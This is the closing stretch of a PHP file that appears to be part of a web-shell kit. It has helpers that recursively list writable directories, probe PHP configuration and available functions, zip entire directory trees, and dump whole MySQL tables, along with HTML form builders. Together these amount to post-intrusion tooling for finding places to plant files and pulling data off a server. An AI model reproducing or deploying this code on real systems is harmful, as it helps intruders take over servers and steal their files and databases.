1512function getUpPath($nowpath) {
1513 $pathdb = explode('/', $nowpath);
1514 $num = count($pathdb);
1515 if ($num > 2) {
1516 unset($pathdb[$num-1],$pathdb[$num-2]);
1517 }
1518 $uppath = implode('/', $pathdb).'/';
1519 $uppath = str_replace('//', '/', $uppath);
1520 return $uppath;
1521}
1522
1523function getcfg($varname) {
1524 $result = get_cfg_var($varname);
1525 if ($result == 0) {
1526 return 'No';
1527 } elseif ($result == 1) {
1528 return 'Yes';
1529 } else {
1530 return $result;
1531 }
1532}
1533
1534function getfun($funName) {
1535 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1536}
1537
1538function GetList($dir){
1539 global $dirdata,$j,$nowpath;
1540 !$j && $j=1;
1541 if ($dh = opendir($dir)) {
1542 while ($file = readdir($dh)) {
1543 $f=str_replace('//','/',$dir.'/'.$file);
1544 if($file!='.' && $file!='..' && is_dir($f)){
1545 if (is_writable($f)) {
1546 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1547 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1548 $dirdata[$j]['dirchmod']=getChmod($f);
1549 $dirdata[$j]['dirperm']=getPerms($f);
1550 $dirdata[$j]['dirlink']=ue($dir);
1551 $dirdata[$j]['server_link']=$f;
1552 $dirdata[$j]['client_link']=ue($f);
1553 $j++;
1554 }
1555 GetList($f);
1556 }
1557 }
1558 closedir($dh);
1559 clearstatcache();
1560 return $dirdata;
1561 } else {
1562 return array();
1563 }
1564}
1565
1566function qy($sql) {
1567 //echo $sql.'<br>';
1568 $res = $error = '';
1569 if(!$res = @mysql_query($sql)) {
1570 return 0;
1571 } else if(is_resource($res)) {
1572 return 1;
1573 } else {
1574 return 2;
1575 }
1576 return 0;
1577}
1578
1579function q($sql) {
1580 return @mysql_query($sql);
1581}
1582
1583function fr($qy){
1584 mysql_free_result($qy);
1585}
1586
1587function sizecount($size) {
1588 if($size > 1073741824) {
1589 $size = round($size / 1073741824 * 100) / 100 . ' G';
1590 } elseif($size > 1048576) {
1591 $size = round($size / 1048576 * 100) / 100 . ' M';
1592 } elseif($size > 1024) {
1593 $size = round($size / 1024 * 100) / 100 . ' K';
1594 } else {
1595 $size = $size . ' B';
1596 }
1597 return $size;
1598}
1599
1600class PHPZip{
1601 var $out='';
1602 function PHPZip($dir) {
1603 if (@function_exists('gzcompress')) {
1604 $curdir = getcwd();
1605 if (is_array($dir)) $filelist = $dir;
1606 else{
1607 $filelist=$this -> GetFileList($dir);
1608 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
1609 }
1610 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
1611 else chdir($curdir);
1612 if (count($filelist)>0){
1613 foreach($filelist as $filename){
1614 if (is_file($filename)){
1615 $fd = fopen ($filename, 'r');
1616 $content = @fread ($fd, filesize($filename));
1617 fclose ($fd);
1618 if (is_array($dir)) $filename = basename($filename);
1619 $this -> addFile($content, $filename);
1620 }
1621 }
1622 $this->out = $this -> file();
1623 chdir($curdir);
1624 }
1625 return 1;
1626 }
1627 else return 0;
1628 }
1629
1630
1631 function GetFileList($dir){
1632 static $a;
1633 if (is_dir($dir)) {
1634 if ($dh = opendir($dir)) {
1635 while ($file = readdir($dh)) {
1636 if($file!='.' && $file!='..'){
1637 $f=$dir .'/'. $file;
1638 if(is_dir($f)) $this->GetFileList($f);
1639 $a[]=$f;
1640 }
1641 }
1642 closedir($dh);
1643 }
1644 }
1645 return $a;
1646 }
1647
1648 var $datasec = array();
1649 var $ctrl_dir = array();
1650 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1651 var $old_offset = 0;
1652
1653 function unix2DosTime($unixtime = 0) {
1654 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1655 if ($timearray['year'] < 1980) {
1656 $timearray['year'] = 1980;
1657 $timearray['mon'] = 1;
1658 $timearray['mday'] = 1;
1659 $timearray['hours'] = 0;
1660 $timearray['minutes'] = 0;
1661 $timearray['seconds'] = 0;
1662 }
1663 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
1664 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1665 }
1666
1667 function addFile($data, $name, $time = 0) {
1668 $name = str_replace('\\', '/', $name);
1669
1670 $dtime = dechex($this->unix2DosTime($time));
1671 $hexdtime = '\x' . $dtime[6] . $dtime[7]
1672 . '\x' . $dtime[4] . $dtime[5]
1673 . '\x' . $dtime[2] . $dtime[3]
1674 . '\x' . $dtime[0] . $dtime[1];
1675 eval('$hexdtime = "' . $hexdtime . '";');
1676 $fr = "\x50\x4b\x03\x04";
1677 $fr .= "\x14\x00";
1678 $fr .= "\x00\x00";
1679 $fr .= "\x08\x00";
1680 $fr .= $hexdtime;
1681
1682 $unc_len = strlen($data);
1683 $crc = crc32($data);
1684 $zdata = gzcompress($data);
1685 $c_len = strlen($zdata);
1686 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1687 $fr .= pack('V', $crc);
1688 $fr .= pack('V', $c_len);
1689 $fr .= pack('V', $unc_len);
1690 $fr .= pack('v', strlen($name));
1691 $fr .= pack('v', 0);
1692 $fr .= $name;
1693 $fr .= $zdata;
1694 $fr .= pack('V', $crc);
1695 $fr .= pack('V', $c_len);
1696 $fr .= pack('V', $unc_len);
1697
1698 $this -> datasec[] = $fr;
1699 $new_offset = strlen(implode('', $this->datasec));
1700
1701 $cdrec = "\x50\x4b\x01\x02";
1702 $cdrec .= "\x00\x00";
1703 $cdrec .= "\x14\x00";
1704 $cdrec .= "\x00\x00";
1705 $cdrec .= "\x08\x00";
1706 $cdrec .= $hexdtime;
1707 $cdrec .= pack('V', $crc);
1708 $cdrec .= pack('V', $c_len);
1709 $cdrec .= pack('V', $unc_len);
1710 $cdrec .= pack('v', strlen($name) );
1711 $cdrec .= pack('v', 0 );
1712 $cdrec .= pack('v', 0 );
1713 $cdrec .= pack('v', 0 );
1714 $cdrec .= pack('v', 0 );
1715 $cdrec .= pack('V', 32 );
1716 $cdrec .= pack('V', $this -> old_offset );
1717 $this -> old_offset = $new_offset;
1718 $cdrec .= $name;
1719
1720 $this -> ctrl_dir[] = $cdrec;
1721 }
1722
1723 function file() {
1724 $data = implode('', $this -> datasec);
1725 $ctrldir = implode('', $this -> ctrl_dir);
1726 return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1727 }
1728}
1729
1730function sqldumptable($table, $fp=0) {
1731 $tabledump = "DROP TABLE IF EXISTS $table;\n";
1732 $tabledump .= "CREATE TABLE $table (\n";
1733
1734 $firstfield=1;
1735
1736 $fields = q("SHOW FIELDS FROM $table");
1737 while ($field = mysql_fetch_array($fields)) {
1738 if (!$firstfield) {
1739 $tabledump .= ",\n";
1740 } else {
1741 $firstfield=0;
1742 }
1743 $tabledump .= " $field[Field] $field[Type]";
1744 if (!empty($field["Default"])) {
1745 $tabledump .= " DEFAULT '$field[Default]'";
1746 }
1747 if ($field['Null'] != "YES") {
1748 $tabledump .= " NOT NULL";
1749 }
1750 if ($field['Extra'] != "") {
1751 $tabledump .= " $field[Extra]";
1752 }
1753 }
1754 fr($fields);
1755
1756 $keys = q("SHOW KEYS FROM $table");
1757 while ($key = mysql_fetch_array($keys)) {
1758 $kname=$key['Key_name'];
1759 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
1760 $kname="UNIQUE|$kname";
1761 }
1762 if(!is_array($index[$kname])) {
1763 $index[$kname] = array();
1764 }
1765 $index[$kname][] = $key['Column_name'];
1766 }
1767 fr($keys);
1768
1769 while(list($kname, $columns) = @each($index)) {
1770 $tabledump .= ",\n";
1771 $colnames=implode($columns,",");
1772
1773 if ($kname == "PRIMARY") {
1774 $tabledump .= " PRIMARY KEY ($colnames)";
1775 } else {
1776 if (substr($kname,0,6) == "UNIQUE") {
1777 $kname=substr($kname,7);
1778 }
1779 $tabledump .= " KEY $kname ($colnames)";
1780 }
1781 }
1782
1783 $tabledump .= "\n);\n\n";
1784 if ($fp) {
1785 fwrite($fp,$tabledump);
1786 } else {
1787 echo $tabledump;
1788 }
1789
1790 $rows = q("SELECT * FROM $table");
1791 $numfields = mysql_num_fields($rows);
1792 while ($row = mysql_fetch_array($rows)) {
1793 $tabledump = "INSERT INTO $table VALUES(";
1794
1795 $fieldcounter=-1;
1796 $firstfield=1;
1797 while (++$fieldcounter<$numfields) {
1798 if (!$firstfield) {
1799 $tabledump.=", ";
1800 } else {
1801 $firstfield=0;
1802 }
1803
1804 if (!isset($row[$fieldcounter])) {
1805 $tabledump .= "NULL";
1806 } else {
1807 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
1808 }
1809 }
1810
1811 $tabledump .= ");\n";
1812
1813 if ($fp) {
1814 fwrite($fp,$tabledump);
1815 } else {
1816 echo $tabledump;
1817 }
1818 }
1819 fr($rows);
1820 if ($fp) {
1821 fwrite($fp,"\n");
1822 } else {
1823 echo "\n";
1824 }
1825}
1826
1827function ue($str){
1828 return urlencode($str);
1829}
1830
1831function p($str){
1832 echo $str."\n";
1833}
1834
1835function tbhead() {
1836 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
1837}
1838function tbfoot(){
1839 p('</table>');
1840}
1841
1842function makehide($name,$value=''){
1843 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
1844}
1845
1846function makeinput($arg = array()){
1847 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
1848 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
1849 !$arg['type'] && $arg['type'] = 'text';
1850 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
1851 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
1852 if ($arg['newline']) {
1853 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
1854 } else {
1855 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
1856 }
1857}
1858
1859function makeselect($arg = array()){
1860 if ($arg['onchange']) {
1861 $onchange = 'onchange="'.$arg['onchange'].'"';
1862 }
1863 $arg['title'] = $arg['title'] ? $arg['title'] : '';
1864 if ($arg['newline']) p('<p>');
1865 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
1866 if (is_array($arg['option'])) {
1867 foreach ($arg['option'] as $key=>$value) {
1868 if ($arg['selected']==$key) {
1869 p("<option value=\"$key\" selected>$value</option>");
1870 } else {
1871 p("<option value=\"$key\">$value</option>");
1872 }
1873 }
1874 }
1875 p("</select>");
1876 if ($arg['newline']) p('</p>');
1877}
1878function formhead($arg = array()) {
1879 !$arg['method'] && $arg['method'] = 'post';
1880 !$arg['action'] && $arg['action'] = $self;
1881 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
1882 !$arg['name'] && $arg['name'] = 'form1';
1883 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
1884 if ($arg['title']) {
1885 p('<h2>'.$arg['title'].' »</h2>');
1886 }
1887}
1888
1889function maketext($arg = array()){
1890 !$arg['cols'] && $arg['cols'] = 100;
1891 !$arg['rows'] && $arg['rows'] = 25;
1892 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
1893 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
1894}
1895
1896function formfooter($name = ''){
1897 !$name && $name = 'submit';
1898 p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
1899 p('</form>');
1900}
1901
1902function formfoot(){
1903 p('</form>');
1904}
1905
1906function pr($a) {
1907 echo '<pre>';
1908 print_r($a);
1909 echo '</pre>';
1910}
1911
1912?>